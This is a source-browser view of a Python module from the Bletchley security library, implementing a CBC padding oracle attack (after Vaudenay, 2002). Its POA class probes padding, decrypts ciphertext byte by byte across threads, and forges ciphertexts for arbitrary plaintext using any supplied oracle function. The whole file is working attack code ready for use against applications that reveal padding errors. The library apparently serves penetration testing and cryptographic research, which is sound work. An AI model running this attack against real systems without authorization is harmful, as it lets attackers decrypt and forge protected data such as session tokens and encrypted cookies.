source: lib/bletchley/CBC/__init__.py @ 18

Last change on this file since 18 was 18, checked in by tmorgan, 12 years ago

documentation, bugfixes

File size: 11.1 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
28class POA:
29    """This class implements padding oracle attacks given a ciphertext and
30    function that acts as a padding oracle.
31
32    The padding scheme is assumed to be PKCS#5/#7, also defined in RFC2040.
33    This attack was first described in:
34     "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC,
35      WTLS" by Serge Vaudenay (2002)
36
37    POA objects are not thread-safe.  If multiple threads need to work
38    simultaneously on the same ciphertext and oracle, create a
39    separate instance.
40
41    """
42
43    ## private
44    _thread_result = None
45    _oracle = None
46    _ciphertext = None
47    _iv = None
48
49    ## protected (reading ok, changing not ok)
50    block_size = None
51
52    ## public (r/w ok)
53    decrypted = None
54    threads = None
55    log_fh = None
56   
57    def __init__(self, oracle, block_size, ciphertext, iv=None,
58                 threads=1, decrypted='', log_file=None):
59        """Creates a new padding oracle attack (POA) object.
60
61        Arguments:
62        oracle -- A function which returns True if the given ciphertext
63         results in a correct padding upon decryption and False
64         otherwise.  This function should implement the prototype:
65           def myOracle(ciphertext, iv)
66         If the initialization vector (iv) is unknown is not included in
67         the ciphertext message, it can be ignored in the oracle
68         implementation (though some limitations will result from this).
69
70        block_size -- The block size of the ciphertext being attacked.
71         Is almost always 8 or 16.
72
73        ciphertext -- The ciphertext to be decrypted
74
75        iv -- The initialization vector associated with the ciphertext.
76         If none provided, it is assumed to be a block of 0's
77
78        threads -- The maximum number of parallel threads to use during
79         decryption.  If more than one thread is used, then the oracle
80         function will be called in parallel.  It should implement any
81         internal locking necessary to prevent race conditions where
82         applicable.
83
84        decrypted -- If a portion of the plaintext is already known (due
85         to a prior, partially successful decryption attempt), then this
86         may be used to restart the decryption process where it was
87         previously left off.  This argument is assumed to contain the
88         final N bytes (for an N-byte argument) of the plaintext; that
89         is, the tail of the plaintext.
90
91        log_file -- A Python file object where log messages will be
92         written.
93
94        """
95
96        if(len(ciphertext)%block_size != 0 or len(ciphertext) < block_size):
97            raise InvalidBlockError(block_size,len(ciphertext))
98        if(iv != None and len(iv)%block_size != 0):
99            raise InvalidBlockError(block_size,len(iv))
100
101        self._oracle = oracle
102        self._ciphertext = ciphertext
103        self._iv = iv
104        self.block_size = block_size
105        self.decrypted = decrypted
106        self.threads = threads
107        self.log_fh = log_file
108
109
110    def log_message(self, s):
111        if self.log_fh != None:
112            self.log_fh.write(s+'\n')
113
114
115    def probe_padding(self, prior, final):
116        """Attempts to verify that a CBC padding oracle exists and then determines the
117        pad value. 
118
119        Returns the pad string, or None on failure.
120        XXX: Currently only works for PKCS 5/7.
121        """
122
123        ret_val = None
124        # First probe for beginning of pad
125        for i in range(0-self.block_size,0):
126            if i == -1:
127                break
128            tweaked = struct.unpack("B", prior[i])[0] ^ 0xFF
129            tweaked = struct.pack("B", tweaked)
130            if not self._oracle(self._ciphertext+prior[:i]+tweaked+prior[i+1:]+final):
131                break
132
133        pad_length = 0-i
134        self.log_message("Testing suspected pad length: %d" % pad_length)
135        if pad_length > 1:
136            # Verify suspected pad length by changing last pad byte to 1
137            # and making sure the padding succeeds
138            tweaked = struct.unpack("B", prior[-1])[0] ^ (pad_length^1)
139            tweaked = struct.pack("B", tweaked)
140            if self._oracle(self._ciphertext+prior[:-1]+tweaked+final):
141                ret_val = buffertools.pkcs7Pad(pad_length)
142
143        else:
144            # Verify by changing pad byte to 2 and brute-force changing
145            # second-to-last byte to 2 as well
146            tweaked = struct.unpack("B", prior[-1])[0] ^ (2^1)
147            tweaked = struct.pack("B", tweaked)
148            for j in range(1,256):
149                guess = struct.unpack("B", prior[-2])[0] ^ j
150                guess = struct.pack("B", guess)
151                if self._oracle(self._ciphertext+prior[:-2]+guess+tweaked+final):
152                    # XXX: Save the decrypted byte for later
153                    ret_val = buffertools.pkcs7Pad(pad_length)
154
155        if ret_val:
156            self.decrypted = ret_val
157
158        return ret_val
159
160
161    # XXX: This could be generalized as a byte probe utility for a variety of attacks
162    def _test_value_set(self, prefix, suffix, value_set):
163        for b in value_set:
164            if self._thread_result != None:
165                # Stop if another thread found the result
166                break
167            if self._oracle(str(prefix+struct.pack("B",b)+suffix)):
168                self._thread_result = b
169                break
170
171
172    def decrypt_next_byte(self, prior, block, known_bytes):
173        """Decrypts one byte of ciphertext by modifying the prior
174        ciphertext block at the same relative offset.
175
176        Arguments:
177        prior -- Ciphertext block appearing prior to the current target
178        block -- Currently targeted ciphertext block
179        known_bytes -- Bytes in this block already decrypted
180
181        """
182
183        if(len(block)!=self.block_size):
184            raise InvalidBlockError
185        numKnownBytes = len(known_bytes)
186       
187        if(numKnownBytes >= self.block_size):
188            return known_bytes
189       
190        prior_prefix = prior[0:self.block_size-numKnownBytes-1]
191        base = ord(prior[self.block_size-numKnownBytes-1])
192        # Adjust known bytes to appear as a PKCS 7 pad
193        suffix = [0]*numKnownBytes
194        for i in range(0,numKnownBytes):
195            suffix[i] ^= ord(prior[0-numKnownBytes+i])^ord(known_bytes[i])^(numKnownBytes+1)
196        suffix = struct.pack("B"*len(suffix),*suffix)+block
197
198        # Each thread spawned searches a subset of the next byte's
199        # 256 possible values
200        self._thread_result = None
201        threads = []
202        for i in range(0,self.threads):
203            t = threading.Thread(target=self._test_value_set, 
204                                 args=(self._ciphertext+prior_prefix, suffix, range(i,256,self.threads)))
205            t.start()
206            threads.append(t)
207           
208        for t in threads:
209            t.join()
210       
211        if self._thread_result == None:
212            raise Exception
213
214        decrypted = struct.pack("B",self._thread_result^base^(numKnownBytes+1))
215        self.decrypted = decrypted + self.decrypted
216        #  Return previous bytes together with current byte
217        return decrypted+known_bytes
218   
219
220    def decrypt_block(self, prior, block, last_bytes=''):
221        """Decrypts the block of ciphertext provided as a parameter.
222
223        """
224
225        while(len(last_bytes)!=self.block_size):
226            last_bytes = self.decrypt_next_byte(prior, block, last_bytes)
227        return last_bytes
228
229
230    # XXX: Add logic to begin where decryption previously left off
231    def decrypt(self):
232        """Decrypts a message using CBC mode. If the IV is not provided,
233        it assumes a null IV.
234
235        """
236
237        blocks = buffertools.splitBuffer(self._ciphertext, self.block_size)
238
239        final = blocks[-1]
240        iv = self._iv
241        if iv == None:
242            iv = '\x00'*self.block_size
243        if len(blocks) == 1:
244            # If only one block present, then try to use IV as prior
245            prior = iv
246        else:
247            prior = blocks[-2]
248
249        # Decrypt last block, starting with padding (quicker to decrypt)
250        pad_bytes = self.probe_padding(prior, final)
251        decrypted = self.decrypt_block(prior, final, pad_bytes)
252
253        # Now decrypt all other blocks except first block
254        for i in range(len(blocks)-2, 0, -1):
255            decrypted = self.decrypt_block(blocks[i-1], blocks[i]) + decrypted
256
257        # Finally decrypt first block
258        decrypted = self.decrypt_block(iv, blocks[0]) + decrypted
259       
260        return buffertools.stripPKCS7Pad(decrypted)
261
262
263    def encrypt_block(self, plaintext, ciphertext):
264        if len(plaintext) != self.block_size or len(plaintext) != len(ciphertext):
265            raise InvalidBlockError(self.block_size,len(plaintext))
266
267        ptext = self.decrypt_block('\x00'*self.block_size, ciphertext)
268        prior = buffertools.xorBuffers(ptext, plaintext)
269        return prior,ciphertext
270   
271   
272    # XXX: Add option to encrypt only the last N blocks.  Supplying a shorter
273    #      plaintext and subsequent concatenation can easily achieve this as well...
274    def encrypt(self,plaintext):
275        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self.block_size), 
276                                         self.block_size)
277
278        if (len(self.decrypted) >= self.block_size
279            and len(self._ciphertext) >= 2*self.block_size):
280            # If possible, reuse work from prior decryption efforts on original
281            # message for last block
282            old_prior = self._ciphertext[0-self.block_size*2:0-self.block_size]
283            final_plaintext = self.decrypted[0-self.block_size:]
284            prior = buffertools.xorBuffers(old_prior,
285                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
286            ciphertext = self._ciphertext[0-self.block_size:]
287        else:
288            # Otherwise, select a random last block and generate the prior block
289            ciphertext = struct.pack("B"*self.block_size, 
290                                     *[random.getrandbits(8) for i in range(self.block_size)])
291            prior,ciphertext = self.encrypt_block(blocks[-1], ciphertext)
292
293        # Continue generating all prior blocks
294        for i in range(len(blocks)-2, -1, -1):
295            prior,cblock = self.encrypt_block(blocks[i],prior)
296            ciphertext = cblock+ciphertext
297       
298        # prior as IV
299        return str(prior),str(ciphertext)
Note: See TracBrowser for help on using the repository browser.